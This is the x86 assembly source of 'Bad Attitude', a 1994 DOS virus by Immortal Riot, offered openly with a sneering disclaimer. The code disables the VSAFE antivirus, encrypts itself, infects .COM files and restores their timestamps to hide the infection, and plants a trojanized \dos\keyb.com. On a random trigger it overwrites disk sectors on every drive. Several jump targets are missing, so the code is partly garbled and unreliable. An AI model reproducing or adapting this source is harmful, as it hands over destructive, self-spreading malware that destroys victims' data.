;                        -Bad Attitude-
;      "Created by Immortal Riot's destructive development team"
;                (c) '94 The Unforgiven/Immortal Riot
;        "If I don't have bad attitude, this virus is harmless"
; Notes:
;  F-Prot, Scan, Tbav, Findviru can't find shits of this virus.
; Disclaimer:
;  If this virus damages you, it's a pleasure, but not the fault 
;  of the author. If you want to sue me, it's your loss.
; Dedication:
;  I dedicate this virus to all virus writers worldwide!

ORG    100h

xchg ax,ax			        
xchg ax,ax			       ; Take down VSAFE from memory!
mov  ax,0fa01h			       
mov  dx,5945h
int  16h

call get_delta_offset

Get_delta_offset:		       ; Get delta offset
pop bp
sub bp, offset get_delta_offset

mov ax,bp
add ax,11Ah                     
push ax
jmp short en_de_crypt                  ; First, decrypt the virus
jmp short real_code_start	       ; and then, continue!

encryption_value dw 0		       ; Random value for each infection!

call en_de_crypt		       ; Encrypt the virus
mov ah,40h
mov cx, offset virus_end-100h
lea dx, [bp+100h]
int 21h
call en_de_crypt		       ; Decrypt the virus again

mov ax,word ptr [bp+encryption_value]
lea si,[bp+real_code_start]
mov cx,(virus_end-real_code_start+1)/2

xor word ptr [si],ax
inc si
inc si
Loop Xor_LoopY

mov ah,2ch			       ; Get Time
int 21h
cmp dl,0			       ; 1%
jne Another_Percent		       
call Create_file

cmp dl,1			       ; another %
jne not_this_time		       ; Naaaaaaah

mov ah,09h			       ; Print the virus name
lea dx,[bp+virus]
int 21h

Trash_sucker:			       ; Overwrite all sectors on all drives!
mov al,2h			       ; on drive C - Z
mov cx,1			                                 
lea bx,virus 	        
int 26h		                                                  
inc dx		
jnc next_sector		                                           
inc al		        
jmp short drive		                                        

Set_Dta:			       ; Set the dta
mov ah,1ah
lea dx,[bp+virus_end]
int 21h

Buffer_Xfer:			       ; Restore the beginning
lea si,[bp+first_bytes]		       
lea di,[bp+@buf]
mov cx,2
rep movsw

mov di,3			       ; Infection-counter

Get_drive:			       ; Get drive from where we're
mov ah,19h			       ; executed from
int 21h

cmp al,2			       
jae Get_Dir			       ; A: or B:, if so, don't infect
jmp restore_start		       ; other programs! Just return normally!

Get_dir:			       ; Get directory from we're executed
mov ah,47h			       ; from!
xor dl,dl
lea si,[bp+dirbuf+1]
int 21h

Find_First:			       ; Find first file
mov cx,111b
lea dx,[bp+filemask]
mov ah,4eh
_4fh:				       ; When called ah=4fh
int 21h

jnc clear_file_attribs		       ; We did find a file!

chdir:				       ; We didn't find a file,
cmp byte ptr [bp+DOSflag],1
jne  dot_dott
jmp no_more_files

mov ah,3bh			       ; so we try in another dir!
lea dx,[bp+offset dot_dot]	       
int 21h
jnc find_first 

mov ah,3bh			       ; We try to infect files in
lea dx,[bp+offset DOS]		       ; \DOS
int 21h
inc byte ptr [bp+dosflag]

jnc find_first
jmp no_more_files

Clear_file_attribs:		       ; Clear file attribs
mov ax,4301h
sub cx,cx
lea dx,[bp+virus_end+1eh]
int 21h

Open_file:			       ; Open the file in read/write mode!
mov ax,3d02h
int 21h
xchg ax,bx

Read_file:			       ; Red the first four bytes of the file
mov ah,3fh
mov cx,4
lea dx,[bp+first_bytes]
int 21h

Check_already_infected:		       ; and check if it's already infected

mov si,dx
lea si,[bp+first_bytes]
cmp word ptr [si],0e990h
je already_infected

cmp word ptr [si],5a4dh		       ; or an EXE file?
je  already_infected
cmp word ptr [si],4d5ah		       ; or an EXE file?
je  already_infected

mov ax,word ptr [bp+virus_end+1ah]     ; or smaller than 400 bytes?  
cmp ax,400
jb already_infected
cmp ax,64000			       ; or bigger than 64000 bytes?
ja already_infected		       ; if so, don't infect �m!


call F_Ptr			       ; Move file-pointer to end of file
sub ax,4			       ; take the last four bytes

mov word ptr [bp+Istbuf],0e990h	       ; Fill the four bytes
mov word ptr [bp+Istbuf+2],ax	       ; with our own jmp-constrution!

_TopOfFile:			       ; Move file-pointer to 
mov ax,4200h			       ; the beginning of file!
int 21h

Write_first4:			       ; Write our own jump instruction
mov ah,40h
mov cx,4
lea dx,[bp+Istbuf]
int 21h

_EOF:				       ; Move to end of file again
call F_Ptr

Get_random:			       ; Get a random value
mov ah,2ch
int 21h
add dl, dh

jz get_random
mov word ptr [bp+encryption_value],dx  ; put it as the encryption value
call write_virus		       ; infect the file

jmp short restore_time_date	       ; Then cover our tracks!

inc di

Restore_Time_Date:		       ; Restore the infected file time
lea si,[bp+virus_end+16h]	       ; and date stamps
mov cx,word ptr [si]
mov dx,word ptr [si+2]
mov ax,5701h
int 21h

Close_file:			       ; Close the file!
mov ah,3eh
int 21h

Set_old_attrib:		               ; Set back old attribs!
mov ax,4301h                    
xor ch,ch			                                               
mov cl,byte ptr [bp+virus_end+15h] 
lea dx,[bp+virus_end+1eh]	 
int 21h				                                     

Enough_files:			       ; Have we infected
dec di				       ; 3 files this run?
cmp di,0
je no_more_files

mov ah,4fh			       ; No, then, search for the next file!
jmp _4fh

No_more_files:			       ; We've infected enough!
lea si,[bp+@buf]
mov di,100h

Restore_dir:			       ; Restore the directory to
lea dx,[bp+dirbuf]		       ; from where we were
mov ah,3bh			       ; executed from!
int 21h

Exit_proc:			       ; and then return to the
mov bx,100h			       ; real-file!
push bx
xor ax,ax

F_Ptr:				       ; Move the file-pointer to end of
mov ax,4202h			       ; file! (used twice!)
xor cx, cx
xor dx, dx
int 21h

Create_file:			       ; Create a new \dos\keyb.com
Mov ah,3ch
mov cx,0
lea dx,[bp+filename]
int 21h

xchg ax,bx
mov ah,64d
mov cx,len
lea dx,[bp+scroll]		       ; Write new content in the file
int 21h

Close_Da_File:			       ; Close the trojanized file
mov ah,3eh
int 21h
ret				       ; and continue..

scroll db "��$��R��2Ҵ��O����",1ah,"	�"
scrol1 db " �Q�8",0ffh,"�Y��z�!�{�!�|�!�}�!�~�!��!���!���!� �!���!���!���!���!� �!O�ImmortalRiot "
len      equ $-scroll

virus db '[BAD ATTITUDE!]$'
copy  db "(c) '94 The Unforgiven/Immortal Riot"

Filemask db '*.COM',0         
Dot_dot  db '..',0	
dos      db '\dos',0

filename db '\dos\keyb.com',0
First_bytes db 90h,90h,50h,0c3h	; Our own little jmp constrution!

@buf        db 4 dup(0)	        ; Empty space to be
Istbuf      db 4 dup(0)	        ; filled with instructions
DIRBUF      db "\"
           db 64 DUP(0)
dosflag    db 0
end virus_start
; ------------------------------------------------------------------------------
; Here is the nice pay-load (read:scroll) in the Bad Attitude virus.

.model tiny
org    100h
mov     al,dl                   
and     al,15

mov     ah,3                    
int     10h
push    dx

mov     dh,al
xor     dl,dl

mov     ah,2
int     10h

mov     di,79
mov     cx,1

mov     ax,91Ah

mov     bl,10
int     10h

push    cx
mov     cx,-200
rep     lodsb
pop     cx

mov     ah,2

mov dl, I
int     21h

mov dl, M
int 21h

mov dl, M2
int 21h

mov dl, O
int 21h

mov dl, R
int 21h

mov dl, T
int 21h

mov dl, A
int 21h

mov dl, L
int 21h

mov dl, ' '
int 21h

mov dl, R2
int 21h

mov dl, I2
int 21h

mov dl, O2
int 21h

mov dl, T2
int 21h

mov dl,' '
int 21h
dec     di
jmp arrow      ; Loop until a ctrl+break is pressed!

I  db 'I'      ; Immortal Riot
M  db 'm'
M2 db 'm'
o  db 'o'
R  db 'r'
T  db 't'
A  db 'a'
L  db 'l'

R2 db 'R'
I2 db 'i'
O2 DB 'o'
T2 DB 't'      ; Is here to stay!
a13 db ' '         

end Ssscroll